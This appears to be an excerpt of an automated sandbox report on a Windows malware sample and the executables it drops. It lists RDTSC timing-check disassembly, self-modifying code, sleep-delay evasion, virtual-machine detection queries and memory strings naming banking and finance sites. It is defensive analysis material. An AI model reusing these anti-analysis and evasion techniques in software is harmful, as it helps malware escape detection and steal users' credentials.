Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B707BE second address: 4B707C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 25A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B707C7 second address: 4B707EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jmp 00007F0084E2F654h 0x0000000d mov dword ptr [esp], esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B707EC second address: 4B707F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B707F0 second address: 4B707F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B707F6 second address: 4B7086C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F0085357C20h 0x0000000f push eax 0x00000010 jmp 00007F0085357C1Bh 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F0085357C24h 0x0000001d xor eax, 05100E28h 0x00000023 jmp 00007F0085357C1Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [76FAB370h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0085357C20h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7086C second address: 4B708EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [ebp-08h], eax 0x0000000d jmp 00007F0084E2F659h 0x00000012 xor eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F0084E2F64Dh 0x0000001b or eax, 2D799656h 0x00000021 jmp 00007F0084E2F651h 0x00000026 popfd 0x00000027 call 00007F0084E2F650h 0x0000002c mov di, cx 0x0000002f pop eax 0x00000030 popad 0x00000031 push ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0084E2F659h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B708EC second address: 4B708F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B708F2 second address: 4B7095A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f pushfd 0x00000010 jmp 00007F0084E2F64Eh 0x00000015 xor ax, 6538h 0x0000001a jmp 00007F0084E2F64Bh 0x0000001f popfd 0x00000020 popad 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 jmp 00007F0084E2F656h 0x00000029 mov dword ptr fs:[00000000h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0084E2F657h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B7095A second address: 4B709AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 646Ah 0x00000007 mov di, 5D36h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F0085357C23h 0x00000018 sbb cx, A5BEh 0x0000001d jmp 00007F0085357C29h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+10h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov esi, ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B709AA second address: 4B709AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B709AF second address: 4B709B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B709B5 second address: 4B70A58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0084E2F658h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007F0084E2F650h 0x00000012 jne 00007F00F716E985h 0x00000018 jmp 00007F0084E2F650h 0x0000001d sub eax, eax 0x0000001f jmp 00007F0084E2F651h 0x00000024 mov dword ptr [ebp-20h], eax 0x00000027 pushad 0x00000028 mov bl, ah 0x0000002a pushfd 0x0000002b jmp 00007F0084E2F659h 0x00000030 sub eax, 25AF6EC6h 0x00000036 jmp 00007F0084E2F651h 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebx, dword ptr [esi] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F0084E2F64Dh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70A58 second address: 4B70A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0085357C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70A76 second address: 4B70A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B70A7A second address: 4B70A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3EEC33 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3EECC2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 592D48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 3EEC39 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 59BFF3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 61FF58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 2EEC33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 2EECC2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 492D48 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 2EEC39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 49BFF3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 51FF58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Special instruction interceptor: First address: 56E607 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Special instruction interceptor: First address: 609DA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Special instruction interceptor: First address: 958901 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Special instruction interceptor: First address: 9589FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Special instruction interceptor: First address: AF22DF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Special instruction interceptor: First address: B7E532 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Special instruction interceptor: First address: 99F910 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Special instruction interceptor: First address: B71BD4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe	Special instruction interceptor: First address: BCCD3C instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory allocated: 4B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory allocated: 4EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Memory allocated: 4CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Memory allocated: F40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Memory allocated: 1AD80000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04BC01B4 rdtsc

0_2_04BC01B4

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window / User API: threadDelayed 3458	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Window / User API: threadDelayed 6353	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3454
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8839
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 816
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8696
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8922
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 726
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8212
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1421

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1013679001\2fdabbc809.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1013680001\f2da6a22b2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3732	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3732	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5588	Thread sleep count: 241 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5588	Thread sleep time: -7230000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3172	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3172	Thread sleep time: -106053s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6024	Thread sleep count: 63 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6024	Thread sleep time: -126063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4052	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5588	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe TID: 2672	Thread sleep time: -15679732462653109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe TID: 6968	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe TID: 2272	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe TID: 5912	Thread sleep time: -36018s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3128	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7056	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5012	Thread sleep count: 8922 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5012	Thread sleep count: 726 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2812	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224	Thread sleep count: 8212 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3352	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1132	Thread sleep count: 1421 > 30
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe TID: 7268	Thread sleep time: -120000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: 75f24a4b40.exe, 00000008.00000002.3281595071.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005495000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: skotes.exe, 00000006.00000002.3317744980.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3317744980.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3240829939.0000000001422000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000002.3281595071.0000000001422000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000008.00000003.3240100682.0000000001422000.00000004.00000020.00020000.00000000.sdmp, 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 75f24a4b40.exe, 00000030.00000002.3299078255.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ae44c30d83.exe, 00000033.00000003.3192703961.0000000001632000.00000004.00000020.00020000.00000000.sdmp, ae44c30d83.exe, 00000033.00000003.3193082205.0000000001650000.00000004.00000020.00020000.00000000.sdmp, ae44c30d83.exe, 00000033.00000003.3191599004.0000000001631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000026.00000002.3121758184.00000000033DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0[
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000005457000.00000004.00000800.00020000.00000000.sdmp, H3tyh96.exe, 00000007.00000002.3359474514.0000000005445000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine: False
Source: 75f24a4b40.exe, 00000030.00000002.3299078255.000000000068B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: H3tyh96.exe, 00000007.00000003.2919601095.00000000070BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:reground}
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: ae44c30d83.exe, 00000033.00000002.3202480904.000000000184E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005495000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: 9e4b3ff3c2.exe, 0000001B.00000002.3089860517.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmp, H3tyh96.exe, H3tyh96.exe, 00000007.00000002.3299916766.000000000054F000.00000040.00000001.01000000.0000000A.sdmp, 75f24a4b40.exe, 00000008.00000002.3253907204.0000000000AD4000.00000040.00000001.01000000.0000000C.sdmp, 9e4b3ff3c2.exe, 0000001B.00000002.3085649699.0000000000B26000.00000040.00000001.01000000.00000012.sdmp, 75f24a4b40.exe, 00000030.00000002.3307675118.0000000000AD4000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2058739593.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: H3tyh96.exe, 00000007.00000002.3359474514.0000000004F71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: H3tyh96.exe, 00000007.00000002.3314067263.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 75f24a4b40.exe, 00000030.00000003.3205274723.0000000005422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
